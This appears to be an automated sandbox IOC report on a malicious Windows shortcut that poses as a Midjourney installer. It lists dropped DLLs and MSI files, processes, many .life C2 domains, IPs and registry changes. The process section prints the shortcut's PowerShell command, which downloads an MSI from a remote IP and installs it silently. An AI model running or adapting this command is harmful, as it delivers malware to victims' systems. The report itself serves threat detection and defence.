IOC Report
Report-41952.lnk

loading gif

Files

File Path
Type
Category
Malicious
Report-41952.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Jul 26 00:26:44 2012, mtime=Thu Jul 26 00:26:44 2012, atime=Thu Jul 26 02:20:50 2012, length=454656, window=hide
initial sample
malicious
C:\ProgramData\BDncqpUxZl.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\y.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {9D88B303-3E62-4D29-9D8E-507E3918FF97}, Number of Words: 10, Subject: Midjourney, Author: Midjourney Inc., Name of Creating Application: Midjourney, Template: ;1033, Comments: This installer database contains the logic and data required to install Midjourney., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 2 17:46:18 2024, Last Saved Time/Date: Wed Oct 2 17:46:18 2024, Last Printed: Wed Oct 2 17:46:18 2024, Number of Pages: 450
dropped
malicious
C:\Windows\Installer\MSI40C1.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSI416E.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSI419D.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSI41BE.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Installer\MSI420D.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Config.Msi\423fe8.rbs
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0t2fnkw.044.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3uazcf3.roa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Installer\{E29C2A9E-997E-49AB-92C0-59583123ED29}\s1.exe
MS Windows icon resource - 1 icon, -113x123, 24 bits/pixel
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\2867298e7ac6986e.customDesusertions-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\9GZ6BKPPOHCLQ7QO684Y.temp
data
dropped
C:\Windows\Installer\423fe6.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {9D88B303-3E62-4D29-9D8E-507E3918FF97}, Number of Words: 10, Subject: Midjourney, Author: Midjourney Inc., Name of Creating Application: Midjourney, Template: ;1033, Comments: This installer database contains the logic and data required to install Midjourney., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 2 17:46:18 2024, Last Saved Time/Date: Wed Oct 2 17:46:18 2024, Last Printed: Wed Oct 2 17:46:18 2024, Number of Pages: 450
dropped
C:\Windows\Installer\MSI42AA.tmp
data
dropped
C:\Windows\Installer\SourceHash{E29C2A9E-997E-49AB-92C0-59583123ED29}
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Installer\inprogressinstallinfo.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Temp\~DF33B0B6D087935130.TMP
data
dropped
C:\Windows\Temp\~DF46983FC733841CC0.TMP
data
dropped
C:\Windows\Temp\~DF635CF01D71DA2922.TMP
data
dropped
C:\Windows\Temp\~DF87340E2A334AC6E5.TMP
Composite Document File V2 Document, Cannot read section info
dropped
There are 14 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://193.242.145.138/mid/w1/Midjourney.msi" -OutFile "C:\Users\user\AppData\Roaming\y.msi";msiexec /i C:\Users\user\AppData\Roaming\y.msi /qn
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Roaming\y.msi /qn
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 800D0887C271C3914D75F510FDC66322
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\ProgramData\BDncqpUxZl.dll"

URLs

Name
IP
Malicious
http://193.242.145.138
unknown
malicious
http://193.242.145.138/mid/w1/Midjourney.msi
193.242.145.138
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://193.242.145.138/mid/w1/midjourney.msi
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://193.242.145.138/mid/w1/Midjourney.msi-OutFileC:
unknown
https://github.com/Pester/Pester
unknown
There are 5 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
8hjv8mbhrlj.life
unknown
malicious
dxyob8x456a.life
unknown
malicious
8qvt5iabz5n.life
unknown
malicious
4izk0gc9is6.life
unknown
malicious
xeoz1f1vjs0.life
unknown
malicious
y0zvqpi42no.life
unknown
malicious
z3z4fq0420z.life
unknown
malicious
nzs8vi9w5o8.life
unknown
malicious
vu5b47m18jn.life
unknown
malicious
6brdh3p893b.life
unknown
malicious
in4pzu7t2pv.life
unknown
malicious
fig3gj0v6qe.life
unknown
malicious
93j4v4jopzd.life
unknown
malicious
8mgj12azbyd.life
unknown
malicious
bev8ymaajb7.life
unknown
malicious
y9neib92f2m.life
unknown
malicious
mjb3r6mcs1f.life
unknown
malicious
38i6lh0rpze.life
unknown
malicious
lrugnff8fkc.life
unknown
malicious
ar7xakeve0o.life
unknown
malicious
8z9m8hndrhp.life
unknown
malicious
08mkuqnx6gv.life
unknown
malicious
ilofx941igp.life
unknown
malicious
4k59ij2ujeu.life
unknown
malicious
o4m5a5no7e8.life
unknown
malicious
8x2apo5m7ri.life
unknown
malicious
m5iukps17y7.life
unknown
malicious
qc4mwjiop45.life
unknown
malicious
lobavyclh8e.life
unknown
malicious
2z1ls31az7s.life
unknown
malicious
7ewh8ltr7il.life
unknown
malicious
1grovn87c8s.life
unknown
malicious
eb4l6wisq9z.life
unknown
malicious
wdga570b8pz.life
unknown
malicious
0tab35o0swu.life
unknown
malicious
vauy5ah65sx.life
unknown
malicious
p5047yjrb8q.life
unknown
malicious
b1h0uaabzyz.life
unknown
malicious
65r8nx12fqr.life
unknown
malicious
zdf5ki8x9r0.life
unknown
malicious
x9yrzer0ndt.life
unknown
malicious
bzc9sq2pz53.life
unknown
malicious
khxcp22s3dz.life
unknown
malicious
he8fq4k8d3w.life
unknown
malicious
vl41cymzzfq.life
unknown
malicious
dw34kmgfl7t.life
unknown
malicious
exueqqmz3ia.life
unknown
malicious
9do3mcejztt.life
unknown
malicious
d0xtxp89bb9.life
unknown
malicious
l9t6r0y6cvi.life
unknown
malicious
6mnudp7zj73.life
unknown
malicious
dpgs2lt1sbz.life
unknown
malicious
du19ek78tjw.life
unknown
malicious
8ru044xed25.life
unknown
malicious
nyy41uibsv5.life
unknown
malicious
2u8znzsbrto.life
unknown
malicious
7r8ln1wswth.life
unknown
malicious
j280b59doxz.life
unknown
malicious
7exy2b231n2.life
unknown
malicious
37z6li6l9y2.life
unknown
malicious
f4vb9n3tdvh.life
unknown
malicious
plll0xq4y82.life
unknown
malicious
hudrx8fn980.life
unknown
malicious
widn8soih8u.life
unknown
malicious
glux8x5b8d6.life
unknown
malicious
drmk5rdefb5.life
unknown
malicious
1v0xhie4os8.life
unknown
malicious
6q894zusd4k.life
unknown
malicious
mk7plk9c6i2.life
unknown
malicious
ru4jvijdytq.life
unknown
malicious
tvx1ovdepj8.life
unknown
malicious
331k2rdkmmb.life
unknown
malicious
234ct3lkozp.life
unknown
malicious
w8ligr695sd.life
unknown
malicious
acgr6r8zdot.life
unknown
malicious
txgogs9p8a1.life
unknown
malicious
f2j20ayqh8y.life
unknown
malicious
pxu1ajsdhqr.life
unknown
malicious
lzeqr3apopn.life
unknown
malicious
eeqwg3mzq07.life
unknown
malicious
l6syolvczan.life
unknown
malicious
3e6rrifr5fn.life
unknown
malicious
y7pzxau0717.life
unknown
malicious
9f6p9g7x13s.life
unknown
malicious
ge0lpqif3ar.life
unknown
malicious
xo8be64ejh2.life
unknown
malicious
9qiliikd3sp.life
45.155.37.103
ygo9u1fkwux.life
37.27.203.12
q7dfpyyhe08.life
213.109.192.75
yan95akxgqt.life
38.180.143.64
07zxfo0kere.life
38.180.86.21
uyn0icgx1kv.life
38.180.144.181
ameagxzo2f7.life
185.26.238.223
736d0mvetjw.life
65.108.214.195
38f5wvwwn7o.life
185.93.221.123
fsr2hskx44p.life
185.81.114.195
nhdeapyfg7e.life
84.32.84.32
0cc2z8zrnhf.life
95.156.207.204
ibcm5at6qrz.life
144.208.127.113
spd22scperm.life
185.36.140.112
There are 90 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
193.242.145.138
unknown
unknown
malicious
185.93.221.123
38f5wvwwn7o.life
Switzerland
185.81.114.195
fsr2hskx44p.life
United Kingdom
45.155.37.103
9qiliikd3sp.life
Netherlands
65.108.214.195
736d0mvetjw.life
United States
84.32.84.32
nhdeapyfg7e.life
Lithuania
185.36.140.112
spd22scperm.life
European Union
213.109.192.75
q7dfpyyhe08.life
unknown
185.26.238.223
ameagxzo2f7.life
European Union
38.180.86.21
07zxfo0kere.life
United States
38.180.143.64
yan95akxgqt.life
United States
21.105.15.36
unknown
United States
192.168.0.101
unknown
unknown
95.156.207.204
0cc2z8zrnhf.life
Spain
38.180.144.181
uyn0icgx1kv.life
United States
37.27.203.12
ygo9u1fkwux.life
Iran (ISLAMIC Republic Of)
144.208.127.113
ibcm5at6qrz.life
United States
127.0.0.1
unknown
unknown
There are 8 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\423fe8.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\423fe8.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\8AD258AA1F14B5241B3BD92233745DF5
E9A2C92EE799BA94290C95851332DE92
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\56DB09C8061D0724DB5BD8D1A2FB8379
E9A2C92EE799BA94290C95851332DE92
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\D58E42ECF8CBE704BABE6C9F1692E9D2
E9A2C92EE799BA94290C95851332DE92
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Midjourney Inc\Midjourney\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Midjourney Inc\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\{E29C2A9E-997E-49AB-92C0-59583123ED29}\
HKEY_CURRENT_USER\SOFTWARE\Midjourney Inc.\Midjourney
Version
HKEY_CURRENT_USER\SOFTWARE\Midjourney Inc.\Midjourney
Path
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1B859070000
heap
page read and write
1B85904F000
heap
page read and write
1A4B37A000
stack
page read and write
1B859076000
heap
page read and write
1DFDF7E000
stack
page read and write
1EA31F95000
heap
page read and write
1EA4BE30000
heap
page read and write
1EA35701000
trusted library allocation
page read and write
1EA4BE00000
heap
page execute and read and write
1EA33860000
trusted library allocation
page read and write
1EA31DEE000
heap
page read and write
1EA4C010000
heap
page read and write
1EA3554C000
trusted library allocation
page read and write
1B85905D000
heap
page read and write
1B859063000
heap
page read and write
1B859048000
heap
page read and write
1B859042000
heap
page read and write
1EA35709000
trusted library allocation
page read and write
7FF8881A0000
trusted library allocation
page read and write
1EA353C2000
trusted library allocation
page read and write
1A4B57C000
stack
page read and write
7FF888260000
trusted library allocation
page read and write
1EA33BF0000
heap
page readonly
1B85902E000
heap
page read and write
7DF42EE30000
trusted library allocation
page execute and read and write
7FF887F12000
trusted library allocation
page read and write
1A4B3FE000
stack
page read and write
1EA31D8A000
heap
page read and write
1EA43DE1000
trusted library allocation
page read and write
1B85904E000
heap
page read and write
1EA33880000
heap
page read and write
1EA33D90000
trusted library allocation
page read and write
1B85907E000
heap
page read and write
1DFDEFE000
stack
page read and write
1B859088000
heap
page read and write
1B85904B000
heap
page read and write
1EA4C151000
heap
page read and write
1B85907C000
heap
page read and write
7FF8880D0000
trusted library allocation
page execute and read and write
1EA35930000
trusted library allocation
page read and write
1EA4BE54000
heap
page read and write
1B859076000
heap
page read and write
7FF888170000
trusted library allocation
page read and write
1B85907E000
heap
page read and write
1B859074000
heap
page read and write
1EA4BF02000
heap
page read and write
7FF887FCC000
trusted library allocation
page execute and read and write
1A4B1FA000
stack
page read and write
7FF8881E0000
trusted library allocation
page read and write
1B859052000
heap
page read and write
1EA33C33000
trusted library allocation
page read and write
1EA3566E000
trusted library allocation
page read and write
1A4C20D000
stack
page read and write
1EA353BA000
trusted library allocation
page read and write
1DFDE7B000
stack
page read and write
7FF888180000
trusted library allocation
page read and write
1EA31D22000
heap
page read and write
7FF8880B0000
trusted library allocation
page read and write
1EA33E6A000
trusted library allocation
page read and write
1B859060000
heap
page read and write
1B85905D000
heap
page read and write
1EA31DF0000
heap
page read and write
1B85907E000
heap
page read and write
1B859048000
heap
page read and write
1EA31D87000
heap
page read and write
1B859052000
heap
page read and write
1B859061000
heap
page read and write
7FF887F2B000
trusted library allocation
page read and write
1EA3565A000
trusted library allocation
page read and write
1B859077000
heap
page read and write
1EA4BF2C000
heap
page read and write
1A4C04E000
stack
page read and write
1EA31F90000
heap
page read and write
1A4B277000
stack
page read and write
1EA33C77000
heap
page read and write
1EA33D80000
heap
page execute and read and write
1B859044000
heap
page read and write
1DFDFFE000
stack
page read and write
1A4BFCF000
stack
page read and write
1DFDAB9000
stack
page read and write
1B859055000
heap
page read and write
7FF887F20000
trusted library allocation
page read and write
1EA31DC6000
heap
page read and write
7FF888120000
trusted library allocation
page read and write
1A4B0FF000
stack
page read and write
7FF888220000
trusted library allocation
page read and write
1B859055000
heap
page read and write
1EA359F6000
trusted library allocation
page read and write
1B85907E000
heap
page read and write
1B85904F000
heap
page read and write
1A4B17D000
stack
page read and write
7FF8880CA000
trusted library allocation
page read and write
1B859037000
heap
page read and write
1EA31FD0000
heap
page read and write
1EA3562C000
trusted library allocation
page read and write
1B859000000
heap
page read and write
7FF888200000
trusted library allocation
page read and write
1EA33BE0000
trusted library allocation
page read and write
1EA4BE5B000
heap
page read and write
7FF887FC6000
trusted library allocation
page read and write
7FF887FD0000
trusted library allocation
page execute and read and write
1EA31CB0000
heap
page read and write
1EA33C30000
trusted library allocation
page read and write
1A4B07E000
stack
page read and write
1EA31CD0000
heap
page read and write
1EA4C169000
heap
page read and write
7FF888160000
trusted library allocation
page read and write
1EA31DB4000
heap
page read and write
7FF8880F2000
trusted library allocation
page read and write
1EA31CA0000
heap
page read and write
1B85902E000
heap
page read and write
7FF887F13000
trusted library allocation
page execute and read and write
1A4C18F000
stack
page read and write
1A4AB05000
stack
page read and write
1A4B2F9000
stack
page read and write
1B858FA0000
heap
page read and write
1EA31EE0000
heap
page read and write
1A4AEFD000
stack
page read and write
1EA33DE1000
trusted library allocation
page read and write
1EA43DF0000
trusted library allocation
page read and write
1EA31DA6000
heap
page read and write
1B859059000
heap
page read and write
7FF887FC0000
trusted library allocation
page read and write
1A4C0CD000
stack
page read and write
7FF8881F0000
trusted library allocation
page read and write
1B858F60000
heap
page readonly
1EA35707000
trusted library allocation
page read and write
1A4B4FE000
stack
page read and write
1B859044000
heap
page read and write
1EA31D47000
heap
page read and write
7FF888210000
trusted library allocation
page read and write
1EA43E5E000
trusted library allocation
page read and write
7FF888240000
trusted library allocation
page read and write
1EA4C100000
heap
page read and write
7FF887F14000
trusted library allocation
page read and write
1B859083000
heap
page read and write
7FF8881B0000
trusted library allocation
page read and write
1A4ABCE000
stack
page read and write
1EA31DB0000
heap
page read and write
1EA4BE20000
heap
page execute and read and write
1EA355E7000
trusted library allocation
page read and write
1B859067000
heap
page read and write
1EA35124000
trusted library allocation
page read and write
7FF888230000
trusted library allocation
page read and write
7FF888100000
trusted library allocation
page execute and read and write
1EA4BF0F000
heap
page read and write
1B859295000
heap
page read and write
7FF888110000
trusted library allocation
page read and write
1B859210000
heap
page read and write
7FF8881C0000
trusted library allocation
page read and write
1EA34A11000
trusted library allocation
page read and write
1B859061000
heap
page read and write
1B85904B000
heap
page read and write
7FF888270000
trusted library allocation
page read and write
1B859042000
heap
page read and write
1EA4C165000
heap
page read and write
1EA34011000
trusted library allocation
page read and write
7FF8880C1000
trusted library allocation
page read and write
1B859039000
heap
page read and write
1B85900B000
heap
page read and write
1B859060000
heap
page read and write
1EA31DF4000
heap
page read and write
1B859056000
heap
page read and write
1A4AE7E000
stack
page read and write
1B85906B000
heap
page read and write
1B859290000
heap
page read and write
1B858F70000
heap
page read and write
1EA4BE27000
heap
page execute and read and write
7FF888030000
trusted library allocation
page execute and read and write
1B85906F000
heap
page read and write
7FF888190000
trusted library allocation
page read and write
1EA43F95000
trusted library allocation
page read and write
7FF8880E0000
trusted library allocation
page execute and read and write
1B859043000
heap
page read and write
1EA33DD0000
heap
page read and write
7FF8881D0000
trusted library allocation
page read and write
1B859063000
heap
page read and write
1B859048000
heap
page read and write
1EA43E52000
trusted library allocation
page read and write
7FF888250000
trusted library allocation
page read and write
1B859074000
heap
page read and write
1B85906B000
heap
page read and write
7FF887FF6000
trusted library allocation
page execute and read and write
1A4AFFB000
stack
page read and write
1B859047000
heap
page read and write
7FF888130000
trusted library allocation
page read and write
1B85905D000
heap
page read and write
1EA4BEA5000
heap
page read and write
1EA359FA000
trusted library allocation
page read and write
7FF887F1D000
trusted library allocation
page execute and read and write
1A4C28E000
stack
page read and write
1EA355D3000
trusted library allocation
page read and write
1EA35405000
trusted library allocation
page read and write
1EA31FD5000
heap
page read and write
1A4AB8E000
stack
page read and write
1EA31D10000
heap
page read and write
1EA4BEA1000
heap
page read and write
1A4AF7E000
stack
page read and write
7FF888140000
trusted library allocation
page read and write
1B858F50000
heap
page read and write
1EA4BF26000
heap
page read and write
1A4B47E000
stack
page read and write
7FF888150000
trusted library allocation
page read and write
1EA353B4000
trusted library allocation
page read and write
1A4C10F000
stack
page read and write
1B85904E000
heap
page read and write
1A4B5FB000
stack
page read and write
1B859067000
heap
page read and write
There are 198 hidden memdumps, click here to show them.